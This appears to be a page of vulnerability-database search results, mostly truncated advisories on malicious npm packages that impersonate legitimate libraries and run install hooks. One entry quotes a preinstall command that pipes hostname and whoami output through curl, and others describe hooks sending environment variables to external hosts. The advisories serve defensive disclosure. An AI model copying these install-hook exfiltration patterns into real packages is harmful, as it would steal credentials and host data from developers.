251589 matches found
GHSA-JXXR-4GWJ-5JF2 vulnerabilities
Vulnerabilities for packages: npm, langfuse, pulumi, renovate, tileserver-gl, lerna, opensearch-dashboards, prism...
MAL-2026-4556 Malicious code in express-enrouten-async (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e Package name mimics the legitimate express-enrouten route-discovery library, but the shipped index.js only hardcodes two demo routes rather than...
Malicious code in express-enrouten-async (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector f944bc544f9368e58a223e76e462ddec4ba325c728a233100182706ad8f0ae0e Package name mimics the legitimate express-enrouten route-discovery library, but the shipped index.js only hardcodes two demo routes rather than...
Malicious code in mmt-static (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 755d0176c106903bf2baaf14d0bb4df611bb719c2a7b0615e9b4487eadee1300 On npm install, the package's preinstall lifecycle hook executes node index.js && curl --data-urlencode "info=$hostname && whoami"...
Malicious code in rapyd-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fb9b157ff532e1e7c1ccd9ae77aec9a89324f24a5a0f27c1ccd70e430f318b60 Package self-presents as a TypeScript SDK for the Rapyd fintech-as-a-service platform and links https://www.rapyd-client.net/ as if it were Rapyd's...
MAL-2026-4658 Malicious code in rapyd-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector fb9b157ff532e1e7c1ccd9ae77aec9a89324f24a5a0f27c1ccd70e430f318b60 Package self-presents as a TypeScript SDK for the Rapyd fintech-as-a-service platform and links https://www.rapyd-client.net/ as if it were Rapyd's...
Malicious code in thevoid (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0ce4d125de5d699da897d074134f8d1f0a971aa23d9c3d6ff3330015fccad091 On install, postinstall.js performs an HTTPS request to void-relay.com carrying process.env contents along with host identifiers process.platform,...
MAL-2026-4345 Malicious code in eo-terminal (npm)
Part of a multi-package malicious campaign by npm author toskypi, eo-terminal is a fully-featured infostealer and remote access trojan RAT disguised as "terminal changelog logger utilities." The package README describes a completely different package terminal-logger-utils, indicating a...
Malicious code in @citi-icg-171632/citicms-repo-component (npm)
--- -= Per source details. Do not edit below this line.=- Source: ossf-package-analysis 88e5400167d9962139f78098013ac4e5eadeeaa76b8916ba246c5f6b2093f508 The OpenSSF Package Analysis project identified '@citi-icg-171632/citicms-repo-component' @ 99.9.1 npm as malicious. It is considered malicious...
Malicious code in share-anything-cli (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 290f9dadaf589349dd8a7c641450aca713a6ead63b2ba685c15e4e6a37ab3b07 The package's package.json declares a postinstall lifecycle hook "postinstall": "node install.js" that runs install.js automatically on npm install...
OESA-2026-2417 kernel security update
The Linux Kernel, the operating system core itself. Security Fixes: In the Linux kernel, the following vulnerability has been resolved:mm/mempolicy: fix migratetonode assuming there is at least one VMA in a MMWe currently assume that there is at least one VMA in a MM, which isn ttrue.So we might...
Malicious code in cdk-sagemaker-notebook-workflow (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 6cc9c1db01ca14b294be21438478ec14dc6549a4b7b9ec5cf73dd7aa227f7ad8 The package declares a preinstall hook node index.js in package.json that fires automatically on npm install. The script collects os.hostname,...
Malicious code in @tmecontinue/claude (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0813d6ca6de1573ab8f99aae08444e589f4c5751931e4b18812140f720b74239 Package self-describes as a 'Reverse-engineered Anthropic Claude Code CLI' and impersonates the legitimate @anthropic-ai/claude-code bin name...
MAL-2026-4457 Malicious code in @tmecontinue/claude (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 0813d6ca6de1573ab8f99aae08444e589f4c5751931e4b18812140f720b74239 Package self-describes as a 'Reverse-engineered Anthropic Claude Code CLI' and impersonates the legitimate @anthropic-ai/claude-code bin name...
Malicious code in logger-draft (npm)
Part of a multi-package malicious campaign by npm author toskypi, logger-draft is a companion package to eo-terminal in the same infostealer and remote access trojan RAT campaign. Both packages share the same actor, C2 infrastructure, and attack pattern, and are distributed together under a...
MAL-2026-4346 Malicious code in logger-draft (npm)
Part of a multi-package malicious campaign by npm author toskypi, logger-draft is a companion package to eo-terminal in the same infostealer and remote access trojan RAT campaign. Both packages share the same actor, C2 infrastructure, and attack pattern, and are distributed together under a...
Security Bulletin: IBM App Connect Enterprise is vulnerable to multiple vulnerabilities due to multiple node modules
Summary IBM App Connect Enterprise Connector Discovery and OpenAPI Editor, IBM App Connect Enterprise Discovery Connectors and IBM App Connect Enterprise runtime are vulnerable to multiple vulnerabilities due to node modules axios, protobufjs, fast-xml-parser, follow-redirects, brace-expansion,...
MAL-2026-4387 Malicious code in @euqns/nudge-mcp (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 9b1e494fee8148b95f98e5de04cc4ecd78ed793ff2d019ae672e2b22d2debc3b The package ships dist/setup.js which performs HTTP POST requests at install time to a hardcoded external endpoint at...
MAL-2026-4252 Malicious code in @43uh3ig43/telemetry-client (npm)
--- -= Per source details. Do not edit below this line.=- Source: amazon-inspector 37d4a096b834c0d9acdddefee09b0c6cb4d8c6f68513b2ebb4ec88424f491e89 On npm install, the package's preinstall, install, and postinstall lifecycle hooks all invoke telemetry.js, which collects host metadata OS,...
Malicious Package
Overview chain-key-validator is a malicious package. This package contains malicious code, and its content was removed from the official package manager. While this package might be attempting to impersonate a valid organization, there is no connection between that organization and this package...